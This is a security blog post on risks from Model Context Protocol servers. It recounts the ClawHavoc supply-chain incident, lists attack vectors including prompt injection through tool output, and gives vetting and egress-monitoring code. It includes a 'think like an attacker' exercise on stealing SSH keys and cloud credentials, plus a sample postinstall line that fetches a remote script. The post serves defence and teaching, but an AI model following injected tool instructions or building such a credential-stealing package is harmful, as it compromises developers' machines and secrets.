MCP Server Security Risks — Why Hackers Are Already Targeting Them

In early 2026, a supply chain attack called ClawHavoc targeted users of the OpenClaw AI agent platform through its community skill repository. Malicious packages disguised as trading bots and developer utilities deployed information-stealing malware the moment they were installed. The attack vector was MCP — Model Context Protocol — the standard that connects AI agents to external tools and services. Most developers integrating MCP servers into their AI applications have never security-reviewed them. What follows is my breakdown of why this is the next major attack surface, what has already been exploited, and what you need to check right now.

What You’ll Learn

What MCP servers are and how they extend AI agent capabilities
The specific security risks unvetted MCP servers introduce
The ClawHavoc case and what it teaches about MCP supply chain attacks
How to vet an MCP server before deployment
The ongoing MCP security landscape in 2026


MCP server security is the component of agentic AI security that most developers don’t think about until they’ve already deployed something vulnerable. MCP security sits at the intersection of agentic AI security and the AI supply chain attack landscape. My coverage of OWASP LLM05 (Supply Chain) in the OWASP AI Top 10 describes the category — my focus here is MCP specifically.


What MCP Servers Are

MCP — Model Context Protocol — is the open standard developed by Anthropic that defines how AI models connect to external tools, data sources, and services. My one-sentence summary for security teams: MCP is the mechanism that gives an AI agent hands. Without MCP, an AI can only produce text. With MCP, it can take actions in the real world. That distinction is the entire basis for the security concern. An MCP server is a piece of software that exposes a set of tools to an AI model through the MCP protocol. The AI can then call those tools as part of completing a task. Claude Code uses MCP servers to give Claude access to file systems, APIs, databases, and custom tools.

MCP ARCHITECTURE — SECURITY CONTEXT
# How MCP works
AI model ← MCP protocol → MCP server → external tool/service/data
AI sees: a list of available tools with descriptions
AI calls: a tool by name with parameters
MCP server: executes the actual action and returns result
# What MCP servers can expose
File system access (read, write, delete)
Shell/terminal execution
API integrations (Slack, GitHub, Jira, Salesforce)
Database queries
Web browsing and scraping
# Why this is a security-critical component
MCP server code runs with OS-level permissions on the host machine
AI can be directed to call any MCP tool via prompt injection
Malicious MCP server = attacker code with AI-level permissions


The MCP Attack Surface

My security concern with MCP is specifically the combination of two factors: most MCP servers are open-source packages downloaded and deployed with minimal security review, and they execute with the full permissions of the AI agent — which as I described in the agentic AI security guide, are often much broader than they should be.

MCP ATTACK VECTORS
# Attack 1: Malicious MCP server (supply chain)
Attacker publishes a useful-looking MCP server on npm/GitHub
Developer installs it → attacker code runs with AI agent permissions
Impact: credential theft, data exfiltration, persistence on developer machine
# Attack 2: Compromised legitimate MCP server
Popular MCP server is maintained by a single developer
Attacker takes over maintainer account → publishes malicious update
All users auto-update → mass deployment of attacker code
# Attack 3: Prompt injection via MCP tool output
MCP tool fetches external data (web page, database record)
Attacker embeds injection payload in that data
AI receives tool output containing hidden instructions → follows them
# Attack 4: Overprivileged MCP tool exploitation
MCP server has file system + shell access + network access
Via prompt injection: attacker directs AI to use these tools maliciously
No separate exploitation needed — the legitimate tool IS the attack vector


ClawHavoc — The MCP Supply Chain Attack

ClawHavoc is the most instructive MCP supply chain attack to date. My analysis of the IBM X-Force report (April 2026): the attack is essentially identical to the npm supply chain attack pattern — but targeted at the AI agent ecosystem rather than the traditional developer ecosystem. The same developer habits that make npm supply chain attacks work (trust the package repository, install recommended packages) make MCP supply chain attacks work.

CLAWHAVOC — ATTACK ANALYSIS
# What happened
Platform targeted: OpenClaw AI agent (community skill repository — ClawHub)
Method: malicious skills disguised as trading bots, utilities, development helpers
Payload: information-stealing malware deployed on developer machines at install
Source: IBM X-Force analysis, April 2026
# How it avoided detection
Skills appeared functional — they did what they advertised
Malicious code was in the install/setup phase, not the runtime behaviour
Community skill repositories had less security scrutiny than npm/PyPI
# The parallel to ClawJacked (separate incident)
Researchers at Oasis Security found: malicious websites could brute-force their way into local OpenClaw instances
Allowed silent data exfiltration via the agent’s built-in autonomy
Patched in OpenClaw version 2026.2.26

EXERCISE — SECURITY REVIEW (15 MIN)
Vet an MCP Server Before Deployment
Pick any MCP server from the Anthropic MCP directory or a GitHub search.
Apply my vetting checklist:

1. PUBLISHER VERIFICATION
Who published this? Individual or organisation?
How old is the account? Any other published packages?
Is there a security disclosure policy?

2. CODE REVIEW (5 minutes)
Read the package.json / setup.py — what dependencies does it pull in?
Check the install/postinstall scripts — do they run anything unexpected?
Search the code for: fetch(), exec(), spawn(), eval(), child_process
Does it make any network requests outside its stated purpose?

3. PERMISSIONS REVIEW
What OS permissions does this MCP server request?
Does it need all of them for its stated function?
Does it request file system access when it claims to be an API wrapper?

4. POPULARITY AND MAINTENANCE
How many GitHub stars / npm downloads?
When was the last commit?
Are there open security issues?

5. VERDICT
Would you deploy this MCP server in a production environment?
If yes: what constraints would you apply to limit blast radius?

✅ The install script check (step 2) is the most important part of MCP vetting. Malicious supply chain packages most commonly execute their payload during npm install, not during runtime — because install happens with elevated privileges and before any security monitoring is active. A legitimate MCP server for Slack integration has no reason to run shell commands during installation. Any postinstall script that does more than build native modules is a red flag worth investigating before proceeding.
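As an added example of step 2 (my own code, not part of the original checklist or of any MCP project), the Python below inspects a parsed package.json for lifecycle scripts and searches source text for the calls listed above; the package name, URL and source snippet are constructed placeholders.

```python
import re

# npm runs these scripts automatically around `npm install`, before any runtime monitoring
LIFECYCLE_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")
NATIVE_BUILD = re.compile(r"^(node-gyp|prebuild-install)\b")  # the one legitimate postinstall job
# Calls the checklist says to search for, plus the downloaders named in the exercise note
RISKY_PATTERNS = {
    "shell_exec": re.compile(r"\b(exec|execSync|spawn|spawnSync)\s*\("),
    "child_process": re.compile(r"\bchild_process\b"),
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "network": re.compile(r"\bfetch\s*\(|https?://"),
    "downloader": re.compile(r"\b(curl|wget)\b|\bnode\s+-e\b"),
}

def vet_manifest(manifest):
    """One finding per lifecycle script in a parsed package.json (dict from json.load)."""
    findings = []
    for name, cmd in manifest.get("scripts", {}).items():
        if name in LIFECYCLE_SCRIPTS:
            findings.append({
                "script": name,
                "command": cmd,
                "risky": [k for k, rx in RISKY_PATTERNS.items() if rx.search(cmd)],
                "native_build_only": bool(NATIVE_BUILD.match(cmd.strip())),
            })
    return findings

def scan_source(source_text):
    """Map each risky pattern to the line numbers where it occurs in a source file."""
    hits = {}
    for lineno, line in enumerate(source_text.splitlines(), 1):
        for k, rx in RISKY_PATTERNS.items():
            if rx.search(line):
                hits.setdefault(k, []).append(lineno)
    return hits

def red_flags(manifest, source_text):
    """Step 2 verdict: lifecycle scripts doing more than a native build, and any shell
    or eval usage in a server that claims to be a plain API wrapper."""
    flags = [f"{f['script']}: {f['command']}" for f in vet_manifest(manifest)
             if not f["native_build_only"]]
    src = scan_source(source_text)
    for k in ("shell_exec", "child_process", "dynamic_eval"):
        flags.extend(f"{k} at line {n}" for n in src.get(k, []))
    return flags

# Constructed sample: a "Slack integration" server whose postinstall pulls a remote script
SAMPLE_MANIFEST = {"name": "example-slack-mcp", "scripts": {"build": "tsc",
    "postinstall": "node -e \"require('https').get('https://example.invalid/s')\""}}
SAMPLE_SOURCE = "import { execSync } from 'child_process';\nconst out = execSync('env');\n"
```

Run `red_flags(SAMPLE_MANIFEST, SAMPLE_SOURCE)` against a real package by loading its package.json with `json.load` and concatenating its source files; a server that only builds native modules in postinstall returns no manifest flag.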


MCP Security Governance

MCP SECURITY GOVERNANCE FRAMEWORK
# For development teams
Maintain an approved MCP server list — no unapproved servers in production
Security review before adding any new MCP server (use checklist above)
Pin MCP server versions — no auto-updates without review
Principle of least privilege — disable MCP tools the AI doesn’t need for each task
# For enterprise AI deployments
Centralise MCP server management — individual developers don’t add their own
Network egress monitoring for MCP servers — alert on unexpected external connections
Sandbox MCP execution — limit what MCP server processes can access on the host
Incident response plan for compromised MCP server — who gets notified, what’s revoked
# The minimum viable MCP security posture (for individuals)
Only install MCP servers from GitHub repositories you can read and understand
Check the package.json postinstall script before running npm install
Pin to a specific commit hash, not a floating version tag
Review any MCP server update before applying it — treat updates as new installs
If a tool requests more permissions than its description justifies: do not install
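An added example for the approved-list and egress-monitoring rules above (my own code, not part of this article's governance framework): the server names, per-server allowlist and connection-log format are assumptions, and the log lines are constructed. It flags connections from MCP server processes that are not on the approved list and connections from approved servers to hosts outside their allowlist.

```python
import ipaddress
import re

# Approved MCP servers and the hosts each one may legitimately reach (constructed policy).
# An empty set means a local-only tool: any outbound connection from it is unexpected.
APPROVED_SERVERS = {
    "slack-mcp": {"slack.com", "api.slack.com"},
    "github-mcp": {"github.com", "api.github.com"},
    "filesystem-mcp": set(),
}

# Assumed log format from a process-level connection audit:
# "<timestamp> proc=<server process> pid=<n> dst=<host or ip>:<port> action=connect"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) proc=(?P<proc>\S+) pid=(?P<pid>\d+) dst=(?P<dst>\S+):(?P<port>\d+)"
)

def is_loopback(host):
    """True for 127.0.0.0/8, ::1 and 'localhost'; local sockets are not egress."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return host == "localhost"

def check_egress(log_lines):
    """Return (process, destination, reason) for every connection that violates policy."""
    alerts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unrelated or malformed line
        proc, dst = m["proc"], m["dst"]
        if proc not in APPROVED_SERVERS:
            alerts.append((proc, dst, "unapproved MCP server process"))
        elif not is_loopback(dst) and dst not in APPROVED_SERVERS[proc]:
            alerts.append((proc, dst, "egress outside allowlist"))
    return alerts

# Constructed sample log: one clean connection, one local socket, two violations
SAMPLE_LOG = [
    "2026-05-02T10:00:01Z proc=slack-mcp pid=4122 dst=api.slack.com:443 action=connect",
    "2026-05-02T10:00:05Z proc=github-mcp pid=4141 dst=127.0.0.1:5432 action=connect",
    "2026-05-02T10:00:09Z proc=filesystem-mcp pid=4130 dst=203.0.113.9:8443 action=connect",
    "2026-05-02T10:00:12Z proc=trading-helper-mcp pid=4150 dst=example.invalid:443 action=connect",
]

if __name__ == "__main__":
    for proc, dst, reason in check_egress(SAMPLE_LOG):
        print(f"ALERT {proc} -> {dst}: {reason}")
```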


The Current MCP Security Landscape

My assessment of where the MCP security ecosystem sits in May 2026 — and this is based on the incident data, not predictions: it’s in approximately the same position as the npm ecosystem was in 2018 — growing fast, widely trusted, and almost completely lacking in systematic security vetting practices. The incidents are starting. The tooling to detect and prevent them is immature. And developer adoption is outpacing security awareness by a significant margin.

MCP SECURITY LANDSCAPE — MAY 2026
# What’s documented
ClawHavoc: supply chain attack via AI skill repository (early 2026)
ClawJacked: website-to-agent attack via local OpenClaw instances (patched Feb 2026)
Approximately 15,000 CVEs disclosed in 2026 to date — dozens impact AI systems
Dark Reading, IBM X-Force, Oasis Security all publishing MCP vulnerability research in 2026
# What’s missing
No centralised security scanning for MCP servers equivalent to npm audit
No standardised permission disclosure format for MCP servers
No widely adopted MCP server security review checklist pre-2026
Most community MCP registries have less security scrutiny than PyPI or npm
# What’s emerging
Anthropic: working on MCP security guidelines and server verification standards
Security vendors: adding MCP server scanning to supply chain security products
Wiz, Snyk, Socket.dev: all building MCP-aware security tooling in 2026

EXERCISE — THINK LIKE AN ATTACKER (10 MIN)
Design a Malicious MCP Server Attack
For educational understanding of the threat — designing the attack teaches you what to look for.

SCENARIO: You want to target developers using AI coding agents.

1. PACKAGE DESIGN
What would you name your malicious MCP server to attract installs?
(Think about what developers are searching for when integrating AI)
What legitimate functionality would it provide as cover?

2. PAYLOAD DELIVERY
Where in the package lifecycle would you execute your malicious code?
(install, import, first use, after X days?)
Why that timing?

3. WHAT YOU’D STEAL
What data does a developer’s machine typically have that’s valuable?
(Think: .env files, SSH keys, git credentials, AWS credentials, browser passwords)

4. PERSISTENCE
How would you maintain access after initial compromise?
How would you avoid detection?

5. DEFENCE IMPLICATION
What specific check in the MCP vetting process would have caught this?
(This is the key insight — attacker design teaches defender priorities)

✅ The timing insight (question 2) is what developers most commonly miss: malicious supply chain packages almost always execute in the install/postinstall phase, not at runtime. This is because install runs before any security monitoring is active, often with elevated privileges, and the developer is watching the terminal output anyway — they don’t notice one extra script running. The defence: check postinstall scripts in package.json before running npm install. Any postinstall that runs curl, wget, node -e, or shell commands on an MCP server that claims to be a simple API wrapper is a red flag.

MCP Security — Key Points

MCP servers execute with AI agent permissions — compromised MCP = attacker code with those permissions
ClawHavoc (early 2026): malicious AI skills deployed info-stealing malware via supply chain
4 attack vectors: malicious server, compromised maintainer, injection via tool output, overprivileged exploitation
Vetting checklist: publisher, install scripts, permissions, network requests, maintenance status
Governance: approved list + version pinning + least privilege + egress monitoring

MCP Server Security — Your Next Step

Audit every MCP server currently deployed in your environment against the vetting checklist. My estimate from the assessments I run: most organisations using AI agents have 3–8 MCP servers deployed, and fewer than half have been through any security review. The checklist above takes 20–30 minutes per server. For a typical deployment, that’s 2 hours of work that significantly reduces your AI agent attack surface. Version-pin them all before this week is out. The two minutes that takes now is worth considerably more than the incident response exercise you’d otherwise be running.


Quick Check

A developer finds an MCP server on GitHub that perfectly integrates their AI agent with their internal database. It has 40 stars and was published 3 weeks ago by an account created 2 months ago. Should they deploy it?




Frequently Asked Questions

What is an MCP server?
An MCP (Model Context Protocol) server is software that exposes a set of tools to an AI model through Anthropic’s Model Context Protocol standard. The AI can call these tools to take actions beyond generating text — accessing files, querying databases, calling APIs, executing code, and interacting with external services. MCP servers are how AI coding agents like Claude Code gain the ability to read and write files, run commands, and interact with development tools.
What was the ClawHavoc attack?
ClawHavoc was a supply chain malware campaign targeting users of the OpenClaw AI agent platform in early 2026. Attackers published malicious packages to the ClawHub community skill repository, disguised as legitimate utilities including trading bots and development helpers. When users installed these packages, information-stealing malware was deployed on their machines. The attack was documented by IBM X-Force in April 2026. My reading of the significance: it represents the first large-scale supply chain attack specifically targeting the AI agent ecosystem, and it succeeded because developers trusted the community repository with the same uncritical instinct they use for npm packages.
How do I vet an MCP server before using it?
Check the publisher’s account age and history. Read the install scripts for unexpected commands. Review all dependencies. Search the code for network requests outside the stated purpose. Verify every permission the server requests is necessary for its function. Check the maintenance history — abandoned packages with recent updates warrant extra scrutiny. For any MCP server with file system, shell, or database access, a full code review before deployment is the minimum standard.
Further Reading

  • Agentic AI Security 2026 — The broader context for MCP risks. How agentic AI creates the attack surface that malicious MCP servers exploit, with the CyberStrikeAI incident and defensive framework.
  • Vibe Coding Security Risks — The development practices that compound MCP risk. Developers deploying unvetted MCP servers as part of rapid AI-assisted development are combining two supply chain risk factors simultaneously.
  • OWASP AI Security Top 10 — LLM05 (Supply Chain) is the OWASP category covering MCP server risk. The full framework with defences for all ten categories.
  • Model Context Protocol — Official Docs — Anthropic’s official MCP architecture documentation. The definitive reference for understanding what MCP servers can and cannot do, with security considerations in the architecture section.
  • IBM X-Force — Agentic AI Vulnerabilities 2026 — The IBM X-Force analysis covering ClawHavoc, ClawJacked, and the broader pattern of vulnerabilities emerging in the agentic AI ecosystem in 2026.
Mr Elite
Owner, SecurityElites.com
My concern about MCP security is identical to my concern about npm security five years ago — and the npm ecosystem took years and multiple high-profile incidents to develop adequate security practices. I worry the MCP ecosystem is on the same trajectory, except the blast radius when a malicious MCP server is deployed is larger, because it runs inside an AI agent with permissions that no typical npm package has. My advice: treat every MCP server you deploy with the same due diligence you’d give a third-party library running in your production authentication system. Because in many deployments, that’s effectively what it is.

Lokesh N. Singh aka Mr Elite
Founder, Securityelites · AI Red Team Educator
Founder of Securityelites and creator of the SE-ARTCP credential. Working penetration tester focused on AI red team, prompt injection research, and LLM security education.